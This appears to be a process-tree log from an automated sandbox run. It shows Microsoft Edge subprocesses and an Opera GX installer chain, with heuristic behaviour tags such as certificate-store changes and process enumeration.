C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:12⤵PID:1564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:12⤵PID:1488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:82⤵PID:1676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:12⤵PID:2808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:12⤵PID:3480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:12⤵PID:2964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:12⤵PID:3996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:12⤵PID:4336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:12⤵PID:4008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:12⤵PID:3112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:12⤵PID:3776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:12⤵PID:648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:12⤵PID:5284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:12⤵PID:5412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:12⤵PID:5488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6972 /prefetch:12⤵PID:5596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6720 /prefetch:12⤵PID:5676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1824 /prefetch:12⤵PID:5164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6532 /prefetch:82⤵PID:5240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1364 /prefetch:12⤵PID:3776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5968 /prefetch:82⤵PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6984 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5548
-
-
C:\Users\Admin\Downloads\OperaGXSetup.exe"C:\Users\Admin\Downloads\OperaGXSetup.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5412 -
C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe --server-tracking-blob=NDRlYWFiMGEwNDFlNWVlMGE1N2RhZDE5MjhjZWI3OGFmYzQ4MzVkZTI4NjRlOWUxNmM2MDdkYmM2ZjNhMDg4NDp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImh0dHBfcmVmZXJyZXIiOiJodHRwczovL3d3dy5vcGVyYS5jb20vIiwiaW5zdGFsbGVyX25hbWUiOiJPcGVyYUdYU2V0dXAuZXhlIiwicHJvZHVjdCI6Im9wZXJhX2d4IiwicXVlcnkiOiIvb3BlcmFfZ3gvc3RhYmxlL3dpbmRvd3M/ZWRpdGlvbj1zdGQtMiZ1dG1fc291cmNlPVBXTmdhbWVzJnV0bV9tZWRpdW09cGEmdXRtX2NhbXBhaWduPVBXTl9HQl9VVlJfMzczNiZlZGl0aW9uPXN0ZC0yJnV0bV9jb250ZW50PTM3MzZfJnV0bV9pZD0yMzA4YzY4OWZlNDE0YWJkOTM5NjFiNzkyYzczMzMwNSZodHRwX3JlZmVycmVyPWh0dHBzJTNBJTJGJTJGd3d3Lm9wZXJhLmNvbSUyRmd4JTNGdXRtX3NvdXJjZSUzRFBXTmdhbWVzJTI2dXRtX21lZGl1bSUzRHBhJTI2dXRtX2NhbXBhaWduJTNEUFdOX0dCX1VWUl8zNzM2JTI2dXRtX2NvbnRlbnQlM0QzNzM2XyUyNnV0bV9pZCUzRDIzMDhjNjg5ZmU0MTRhYmQ5Mzk2MWI3OTJjNzMzMzA1JTI2ZWRpdGlvbiUzRHN0ZC0yJnV0bV9zaXRlPW9wZXJhX2NvbSZ1dG1fbGFzdHBhZ2U9b3BlcmEuY29tJTJGJnV0bV9pZD0yMzA4YzY4OWZlNDE0YWJkOTM5NjFiNzkyYzczMzMwNSZkbF90b2tlbj02Nzg3NDQ2MCIsInRpbWVzdGFtcCI6IjE3MjYyNTk4ODQuMTg5MyIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS85Mi4wLjQ1MTUuMTMxIFNhZmFyaS81MzcuMzYgRWRnLzkyLjAuOTAyLjY3IiwidXRtIjp7ImNhbXBhaWduIjoiUFdOX0dCX1VWUl8zNzM2IiwiY29udGVudCI6IjM3MzZfIiwiaWQiOiIyMzA4YzY4OWZlNDE0YWJkOTM5NjFiNzkyYzczMzMwNSIsImxhc3RwYWdlIjoib3BlcmEuY29tLyIsIm1lZGl1bSI6InBhIiwic2l0ZSI6Im9wZXJhX2NvbSIsInNvdXJjZSI6IlBXTmdhbWVzIn0sInV1aWQiOiI0YTllY2NkNi00MWQyLTQ3MWItOTllNi1hY2JjZGE2NDNiYjgifQ==3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:5896 -
C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=113.0.5230.75 --initial-client-data=0x330,0x334,0x338,0x30c,0x33c,0x74091864,0x74091870,0x7409187c4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2628
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5312
-
-
C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=1 --general-interests=1 --general-location=1 --personalized-content=1 --personalized-ads=1 --vought_browser=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=5896 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_20240913203818" --session-guid=7ce49914-d5ac-40e5-849d-f6f67760cd60 --server-tracking-blob=ZTZkODZmY2FjMDZjYTVmMTNkZDcwN2U3NWUzMWJhZmQ2ODliNDJhZGYyYzA0ZDk2ODFlMDJmNDc2ZWFhN2MxNzp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImh0dHBfcmVmZXJyZXIiOiJodHRwczovL3d3dy5vcGVyYS5jb20vIiwiaW5zdGFsbGVyX25hbWUiOiJPcGVyYUdYU2V0dXAuZXhlIiwicHJvZHVjdCI6eyJuYW1lIjoib3BlcmFfZ3gifSwicXVlcnkiOiIvb3BlcmFfZ3gvc3RhYmxlL3dpbmRvd3M/ZWRpdGlvbj1zdGQtMiZ1dG1fc291cmNlPVBXTmdhbWVzJnV0bV9tZWRpdW09cGEmdXRtX2NhbXBhaWduPVBXTl9HQl9VVlJfMzczNiZlZGl0aW9uPXN0ZC0yJnV0bV9jb250ZW50PTM3MzZfJnV0bV9pZD0yMzA4YzY4OWZlNDE0YWJkOTM5NjFiNzkyYzczMzMwNSZodHRwX3JlZmVycmVyPWh0dHBzJTNBJTJGJTJGd3d3Lm9wZXJhLmNvbSUyRmd4JTNGdXRtX3NvdXJjZSUzRFBXTmdhbWVzJTI2dXRtX21lZGl1bSUzRHBhJTI2dXRtX2NhbXBhaWduJTNEUFdOX0dCX1VWUl8zNzM2JTI2dXRtX2NvbnRlbnQlM0QzNzM2XyUyNnV0bV9pZCUzRDIzMDhjNjg5ZmU0MTRhYmQ5Mzk2MWI3OTJjNzMzMzA1JTI2ZWRpdGlvbiUzRHN0ZC0yJnV0bV9zaXRlPW9wZXJhX2NvbSZ1dG1fbGFzdHBhZ2U9b3BlcmEuY29tJTJGJnV0bV9pZD0yMzA4YzY4OWZlNDE0YWJkOTM5NjFiNzkyYzczMzMwNSZkbF90b2tlbj02Nzg3NDQ2MCIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyNjI1OTg4NC4xODkzIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkyLjAuNDUxNS4xMzEgU2FmYXJpLzUzNy4zNiBFZGcvOTIuMC45MDIuNjciLCJ1dG0iOnsiY2FtcGFpZ24iOiJQV05fR0JfVVZSXzM3MzYiLCJjb250ZW50IjoiMzczNl8iLCJpZCI6IjIzMDhjNjg5ZmU0MTRhYmQ5Mzk2MWI3OTJjNzMzMzA1IiwibGFzdHBhZ2UiOiJvcGVyYS5jb20vIiwibWVkaXVtIjoicGEiLCJzaXRlIjoib3BlcmFfY29tIiwic291cmNlIjoiUFdOZ2FtZXMifSwidXVpZCI6IjRhOWVjY2Q2LTQxZDItNDcxYi05OWU2LWFjYmNkYTY0M2JiOCJ9 --desktopshortcut=1 --wait-for-package --initial-proc-handle=98090000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=113.0.5230.75 --initial-client-data=0x320,0x324,0x328,0x2fc,0x32c,0x71941864,0x71941870,0x7194187c5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3524
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2524
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5564 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=73.0.3856.382 --initial-client-data=0x288,0x28c,0x290,0x264,0x294,0x1d4f48,0x1d4f58,0x1d4f645⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5452
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6244 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:12⤵PID:1544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:12⤵PID:5548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6720 /prefetch:82⤵PID:456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6776 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:12⤵PID:6136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:12⤵PID:3292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:12⤵PID:5424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:12⤵PID:6132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:12⤵PID:5280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:12⤵PID:4912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:12⤵PID:980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:12⤵PID:5756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:12⤵PID:5528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2200 /prefetch:12⤵PID:912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:12⤵PID:1592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:12⤵PID:6060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:12⤵PID:1052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:12⤵PID:216
-
-
